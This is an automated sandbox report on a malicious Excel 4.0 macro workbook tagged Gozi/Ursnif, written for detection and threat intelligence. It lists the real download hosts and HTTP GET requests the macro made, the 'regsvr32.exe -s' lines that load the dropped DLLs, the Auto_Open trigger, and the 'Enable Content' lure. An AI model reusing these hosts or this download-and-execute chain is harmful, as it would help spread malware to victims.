
Analysis Report 12345.xlsm

Overview

General Information

Sample Name: 12345.xlsm
Analysis ID: 382553
MD5: 5851c6423d6cffdbfdd9ce4276592acb
SHA1: 8992a00647a35e67a887127b5aa7269cc9c597c6
SHA256: a7893081be92e7c0c1672482df252f282abca98ff09ff559f246bcc5244d74c3
Tags: GG, Gozi, ISFB, Ursnif, xlsm

Detection

Hidden Macro 4.0
Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Allocates a big amount of memory (probably used for heap spraying)
Excel documents contains an embedded macro which executes code when the document is opened
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2308 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 1476 cmdline: regsvr32.exe -s ..\nvcoerf.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 1820 cmdline: regsvr32.exe -s ..\nvcoerf1.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2560 cmdline: regsvr32.exe -s ..\nvcoerf2.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2608 cmdline: regsvr32.exe -s ..\nvcoerf3.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2592 cmdline: regsvr32.exe -s ..\nvcoerf4.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
app.xml | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: 12345.xlsm | ReversingLabs: Detection: 16%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe
Source: excel.exe | Memory has grown: Private usage: 4MB later: 126MB
Source: global traffic | DNS query: name: velma-harber30ku.com
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 8.211.4.209:80
Source: Joe Sandbox View | IP Address: 103.205.143.227
Source: Joe Sandbox View | IP Address: 8.211.4.209
Source: Joe Sandbox View | IP Address: 74.208.236.90
Source: global traffic | HTTP traffic detected: GET /gg.gif HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: velma-harber30ku.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /gg.gif HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: laura9630fr.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /gg.gif HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: mills-skyla30ec.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /ds/0204.gif HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: moumitas.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /ds/0204.gif HTTP/1.1 | Accept: */* | UA-CPU: AMD64 | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: jacktech.jackindia.com | Connection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\699323C9.png
Source: unknown | DNS traffic detected: queries for: velma-harber30ku.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 503 Service Unavailable | Date: Tue, 06 Apr 2021 07:48:01 GMT | Server: Apache/2.4.6 (CentOS) PHP/5.4.16 | X-Powered-By: PHP/5.4.16 | Content-Length: 74 | Connection: close | Content-Type: text/html; charset=UTF-8 | Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 67 67 2e 67 69 66 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e | Data Ascii: <h1>Not Found.</h1>The requested URL /gg.gif was not found on this server.
Source: regsvr32.exe, 00000003.00000002.2093312611.0000000001CE0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093803930.0000000001C90000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2094400807.0000000001D80000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2094974245.0000000001C80000.00000002.00000001.sdmp, regsvr32.exe, 00000007.00000002.2096134178.0000000001C30000.00000002.00000001.sdmp | String found in binary or memory: http://servername/isapibackend.dll

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 | Screenshot OCR: Enable Editing, please click Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18
Source: Screenshot number: 4 | Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU
Source: Document image extraction number: 9 | Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
Source: Document image extraction number: 9 | Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
Source: Screenshot number: 8 | Screenshot OCR: Enable Editing 11 1 from the yellow bar above 12 13 ' @ Once You have Enable Editing, please clic
Source: Screenshot number: 8 | Screenshot OCR: Enable Content 14 1 from the yellow bar above 15 CI c? 16 17 I 18 I WHY I CANNOTOPEN THIS DOCU
Found Excel 4.0 Macro with suspicious formulas
Source: 12345.xlsm | Initial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheet
Source: 12345.xlsm | Initial sample: Sheet size: 30888
Source: workbook.xml | Binary string: " sheetId="5" r:id="rId1"/><sheet name="Doc1" sheetId="4" r:id="rId2"/><sheet name="Doc2" sheetId="1" r:id="rId3"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">'Doc1'!$BO$133</definedName></definedNames><calcPr calcId="122211"/></workbook>
Source: classification engine | Classification label: mal72.expl.evad.winXLSM@11/10@5/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$12345.xlsm
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRC947.tmp
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 12345.xlsm | ReversingLabs: Detection: 16%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s ..\nvcoerf.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s ..\nvcoerf1.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s ..\nvcoerf2.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s ..\nvcoerf3.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s ..\nvcoerf4.dll
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: 12345.xlsm | Initial sample: OLE zip file path = xl/media/image1.png
Source: 12345.xlsm | Initial sample: OLE zip file path = xl/media/image2.png
Source: 12345.xlsm | Initial sample: OLE zip file path = xl/media/image3.png
Source: 12345.xlsm | Initial sample: OLE zip file path = xl/media/image4.png
Source: 12345.xlsm | Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: 12345.xlsm | Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: 12345.xlsm | Initial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s ..\nvcoerf.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
Source: Yara match | File source: app.xml, type: SAMPLE

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scripting21 | Path Interception | Process Injection1 | Regsvr321 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Exploitation for Client Execution23 | Boot or Logon Initialization Scripts | Extra Window Memory Injection1 | Masquerading1 | LSASS Memory | System Information Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol13 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools1 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer4 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting21 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Extra Window Memory Injection1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |

Behavior Graph


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label | Link
12345.xlsm | 17% | ReversingLabs | Document-Excel.Trojan.Heuristic |

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label | Link
http://velma-harber30ku.com/gg.gif | 0% | Avira URL Cloud | safe |
http://mills-skyla30ec.com/gg.gif | 0% | Avira URL Cloud | safe |
http://jacktech.jackindia.com/ds/0204.gif | 0% | Avira URL Cloud | safe |
http://moumitas.com/ds/0204.gif | 0% | Avira URL Cloud | safe |
http://laura9630fr.com/gg.gif | 0% | Avira URL Cloud | safe |
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe |

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
laura9630fr.com | 8.211.4.209 | true | false | | unknown
mills-skyla30ec.com | 8.211.4.209 | true | false | | unknown
jacktech.jackindia.com | 103.205.143.227 | true | false | | unknown
velma-harber30ku.com | 8.211.4.209 | true | false | | unknown
moumitas.com | 74.208.236.90 | true | false | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://velma-harber30ku.com/gg.gif | false | Avira URL Cloud: safe | unknown
http://mills-skyla30ec.com/gg.gif | false | Avira URL Cloud: safe | unknown
http://jacktech.jackindia.com/ds/0204.gif | false | Avira URL Cloud: safe | unknown
http://moumitas.com/ds/0204.gif | false | Avira URL Cloud: safe | unknown
http://laura9630fr.com/gg.gif | false | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://servername/isapibackend.dll | regsvr32.exe, 00000003.00000002.2093312611.0000000001CE0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2093803930.0000000001C90000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2094400807.0000000001D80000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2094974245.0000000001C80000.00000002.00000001.sdmp, regsvr32.exe, 00000007.00000002.2096134178.0000000001C30000.00000002.00000001.sdmp | false | Avira URL Cloud: safe | low

Contacted IPs

Public

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
103.205.143.227 | jacktech.jackindia.com | India | | 132335 | NETWORK-LEAPSWITCH-INLeapSwitchNetworksPvtLtdIN | false
8.211.4.209 | laura9630fr.com | Singapore | | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | false
74.208.236.90 | moumitas.com | United States | | 8560 | ONEANDONE-ASBrauerstrasse48DE | false

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 382553
Start date: 06.04.2021
Start time: 09:47:08
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 6m 16s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: 12345.xlsm
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal72.expl.evad.winXLSM@11/10@5/3
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsm
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe
• VT rate limit hit for: /opt/package/joesandbox/database/analysis/382553/sample/12345.xlsm

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context


              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\699323C9.png
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced
              Category:dropped
              Size (bytes):8301
              Entropy (8bit):7.970711494690041
              Encrypted:false
              SSDEEP:192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh
              MD5:D8574C9CC4123EF67C8B600850BE52EE
              SHA1:5547AC473B3523BA2410E04B75E37B1944EE0CCC
              SHA-256:ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
              SHA-512:20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview: .PNG........IHDR.......:......IJ.....sRGB.........pHYs..........+.... .IDATx^..\....}.\6"Sp...g..9Ks..r..=r.U....Y..l.S.2...Q.'C............h}x........... ......\..N...z....._.|......III.666...~~~..6l.Q.J...\..m..g.h.SRR.\.p....'N...EEE...X9......c.&M...].n.g4..E..g...w...{..]..;w..I...y.m\...~..;.].3{~..qV.k..._....?..w/$GlI|..2. m,,,.-[.....sr.V1..g...on...........dl.'...'''[[[.R.......(..^...F.PT.Xq..Mnnn.3..M..g.......6.....pP"#F..P/S.L...W.^..o.r.....5H......111t....|9..3...`J..>...{..t~/F.b..h.P..]z..)......o..4n.F..e...0!!!......#""h.K..K.....g.......^..w.!.$.&...7n.].F.\\\.A....6lxjj.K/........g.....3g......f....:t..s..5.C4..+W.y...88..?.,Y. .^...8{.@VN.6....Kbch.=zt...7+T....v.z....P........VVV..."t.N......$..Jag.v.U...P[(_.I?.9.4i.G.$U..D......W.r...........!>|..#G...3..x.b......P....H!.Vj......u.2..*;..Z..c..._Ga....&L.......`.1.[.n].7..W_m..#8k...)U..L.....G..q.F.e>..s.......q....J....(.N.V...k..>m....=.).
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\761041BF.png
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
              Category:dropped
              Size (bytes):848
              Entropy (8bit):7.595467031611744
              Encrypted:false
              SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
              MD5:02DB1068B56D3FD907241C2F3240F849
              SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
              SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
              SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H*................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY*.^......IEND.B`.
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7B5BE736.png
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
              Category:dropped
              Size (bytes):557
              Entropy (8bit):7.343009301479381
              Encrypted:false
              SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
              MD5:A516B6CB784827C6BDE58BC9D341C1BD
              SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
              SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
              SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.|.-P#P;..p._.......jUG....X........IEND.B`.
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E4AC70B4.png
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:PNG image data, 364 x 139, 8-bit/color RGBA, non-interlaced
              Category:dropped
              Size (bytes):8854
              Entropy (8bit):7.949751503848125
              Encrypted:false
              SSDEEP:192:VS+uZNogNC+NXtYvselFpeBnmMYCft0gVaSgZTaG+3uWYvVZmSGQ9pFT+x5ylxvr:03CbJ+mMYCmgUrNaB3uzvPm1UpFimlxj
              MD5:780FD0ABF9055E2D8FA1BAB6D4B9163E
              SHA1:CFCD5C73C9C517161DEC8D4B01ABFCA4B272AEBE
              SHA-256:6A3CDBFDB8911742673C2882E912369BC525A7BD41C9B6EFC5C9A84DAFF6C3B2
              SHA-512:8359AF512FA5771EB542B1A854F15E74555C7E1F956924520AC6CEBBAE1322D27AC8FBDD390275C5A31223613986B0CBF5871A406CA2DDBB996B9EB7A94E871A
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview: .PNG........IHDR...l.........E..7....pHYs.................tEXtSoftware.Adobe ImageReadyq.e<.."#IDATx..]M.$.u.Y...V.Z!$......C.H2>.....JBR....c.2..k....'.f......qg..7O.W..0.'.bO6x...l..#!W...`h.~......Y...*+..._.x.".....#.....[........C.ISj..i..i.peOD..BT.N....IoD..qS..M{.I.D...!...[."A....GM........I.M......'T#D....&Q.H.."...Cqn"l....&.G.Mo....MI......u&.~.#k............R...<Q7%o~}.$d..L..j.<l..<...N.K.M"l.aU...G,N...v....LE..Y@.l....;n.?.Z%.&.V.....,.d".K^bM..B. ....B.l"l.a.....<...q...."K.....{.,...j.&...F.@xU......i.q..R.`u#<...........mR...j+ ..^.x...1TR..qw"l....&.a.W...}v.......S.zT..a...J.0....5... E..i"l.a%..<............lSM.a...N.........hI....."D...R.u....."Q.K.#.gM)}.L...*..b..D.y9{.kR7aA....:_..LL#......M...).{.l..O..lv...lP0l+....Y.Y.5.....j@$.C.h!qy/.D..%...g.c...D.......X..M$O.v%Z..S.%w..1"l....B'.O.I..B..}.............iL...X..3..`[.g...j..J.'...Y...rr..@m....@.uC.#......e!.4...M.a.y.......&h.o...Y.Q...@....N]6..."H.
              C:\Users\user\AppData\Local\Temp\91DE0000
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):95644
              Entropy (8bit):7.876847080944676
              Encrypted:false
              SSDEEP:1536:m/JbW9FdM374yC2hawvTJIVseTSV7SaTe8NDUYl+LrHtlmuzx2rfg8:GJbW9FdM37OMvhnSaTDDFysE2rr
              MD5:050A914F070781F5D082643D109AC64B
              SHA1:19454C889848ACEE4AB57B46D558D9F7559057C6
              SHA-256:8F3F5D498B2A305BFC71CF3B9C36575AA534FB2B4385033DF802E0951F087B73
              SHA-512:6813F90051781DCDEE696054FC2777D5921DAE1819C67D7A25E6AC4521B81F56E6B736902416D9727F793AE5F6BB9403D552F4B6D2F1D9560539B998438A5285
              Malicious:false
              Preview: .U.N.0..#.?D....#4j.b........mb./..h..k7.......>......."j.Zv.LX.Nz.]..wW.9.0.....Z..d...'.u....e}J.7.({........G+.....B.E..l2..w.\.S.`.._X.{....].8.k.?...T.D.FK..(.pjG.........D.`. ....&DM...R.`..^...Mm..|}?"........%..:.O*.B^9...G.....F.t-,..W.?...{.l...2-..`..Xc......Z..=;<.T.....;$.>$../').#>.....y..m..za.....b.}S.D..x..|.f$8.......1.^DP...t...^s..PQ<f.|......c.4.n..H.4.....=.]."..4l....U...q....y.+P{.yy.........PK..........!...`.............[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\12345.LNK
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Tue Apr 6 15:47:39 2021, atime=Tue Apr 6 15:47:39 2021, length=95644, window=hide
              Category:dropped
              Size (bytes):1984
              Entropy (8bit):4.515851448728121
              Encrypted:false
              SSDEEP:48:8ufc/XT0jFt1QBaQh2ufc/XT0jFt1QBaQ/:8r/XojFtuBaQh2r/XojFtuBaQ/
              MD5:A42E1B2F2EB49399030FF949E1FD9AA7
              SHA1:E549D5FDAB738F24C17AEC23D61D65C03095C78D
              SHA-256:B9565B4E5D4619DA0F545F7B203C1E02D4C42DDAE508CC6E7CF4C9BF04C95921
              SHA-512:253ED6013AD30706BC834C52325F2DA74316EDF5AE423CD32796A43DE039D97F70138F9A5AA85E97CBE4658EBDBE617E600833EF9998DB421C68B30DF6189384
              Malicious:false
              Preview: L..................F.... ...jK.{.......+.......+...u...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....\.2..u...R. .12345~1.XLS.B.......Q.y.Q.y*...8.....................1.2.3.4.5...x.l.s.m.......t...............-...8...[............?J......C:\Users\..#...................\\830021\Users.user\Desktop\12345.xlsm.!.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.1.2.3.4.5...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......830021..........D_....3N...W...9F.C...........[D_....3N...W...9F.C...........[....L.......
              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Apr 6 15:47:39 2021, atime=Tue Apr 6 15:47:39 2021, length=12288, window=hide
              Category:dropped
              Size (bytes):867
              Entropy (8bit):4.477827899747489
              Encrypted:false
              SSDEEP:12:85QpCfsfsCLgXg/XAlCPCHaXtB8XzB/6MExX+Wnicvb3bDtZ3YilMMEpxRljKg1x:85akU/XTd6jcxYefDv3qXqrNru/
              MD5:17C5ED0D3A4A2A9F20A997F68242EE84
              SHA1:82196D6FC7570C3DE1D7614294EB4F3B70330846
              SHA-256:44E7F9FEBF8656BFE856E002228F3D57C23D2CE704C1235D25F4FA3C8ECA0A5D
